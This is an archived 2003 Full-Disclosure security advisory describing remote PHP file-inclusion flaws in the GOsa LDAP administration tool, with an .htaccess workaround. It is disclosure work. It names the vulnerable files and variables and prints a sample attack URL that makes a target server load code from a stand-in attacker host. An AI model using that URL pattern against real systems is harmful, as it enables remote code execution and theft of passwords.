[Full-Disclosure] GOnicus System Administrator php injection

From: Karol Więsek (appelastat_private)
Date: Sun Feb 23 2003 - 13:17:58 PST

Next message: snsadvat_private: "[SNS Advisory No.62] Webmin/Usermin Session ID Spoofing Vulnerability "Episode 2""

Previous message: Frog Man: "[VulnWatch] WihPhoto (PHP)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----

I. BACKGROUND

The GOnicus System Administrator is a PHP based administration tool
for managing accounts/systems in LDAP databases.

Project homepage : http://www.gonicus.de

II. DESCRIPTION

A remote attacker can inject into GOsa arbitrary PHP code 
that executes under the privileges of the underlying web server. 
There are serveral places, where by modifying several variables
attacker could execute arbitrary PHP code. 

By setting plugin variable in following files attacker could
include remote files and execute them as a PHP code :

plugins/3fax/1blocklists/index.php
plugins/2administration/6departamentadmin/index.php
plugins/2administration/5terminals/index.php
plugins/2administration/4mailinglists/index.php
plugins/2administration/3departaments/index.php
plugins/2administration/2groupd/index.php

The same situation exists in include/help.php where we could
set base variable as a remote host and include remote file.


The following is a sample attack URL that would cause 
"target.server" to load include/common.inc from  
"attackers.server".

http://target.server/include/help.php?base=http://attackers.server/

GOsa doesnt' support "register_globals off".

III. ANALYSIS

Remote exploitation allows an attacker to execute arbitrary 
commands and code under the privileges of the web server. This also
opens the door to privilege escalation attacks. Attacker could also
debug httpd child processes and grab secret information like users
system passwords, LDAP passwords.

IV. DETECTION

GOsa version 1.0.0 ( current ) is confirmed vulnerable.

V. Workaround

Temporary solution is to enable apache .htaccess authentication
in all subdirectories containing .php files, which are included, not
accessed directly.

Example .htaccess file

AuthType Basic
AuthName koza
UserAuthFile /dev/null
require valid-user

- -- 
Karol Więsek [appelast-at-bsquad.sm.pl]
http://bsquad.sm.pl/

"Knajpa: miejsce, dokąd się co wieczór chodzi po raz ostatni w
życiu."

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8
Comment: Bear Software, LLC,  http://bear-software.freeservers.com

iQCVAwUBPlksdkKKOIVhErCVAQEeaAP+PBSWgy6Dealk+B3nNEmTQnsOzgUUuDd+
KNAapeZmyyzmsHR+BmCAiKLICtau+3OivQbRyhuIjh/I1oXrmFRDSdZVEWaau6c4
peTHhoHaTEbOpn4Wuc0D1axJhaeCboc1syOY3sss/U8cd+jEz7wQgBvWRcbmR02H
VhwGjAjsVm8=
=TYVx
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Next message: snsadvat_private: "[SNS Advisory No.62] Webmin/Usermin Session ID Spoofing Vulnerability "Episode 2""
Previous message: Frog Man: "[VulnWatch] WihPhoto (PHP)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Feb 23 2003 - 13:31:47 PST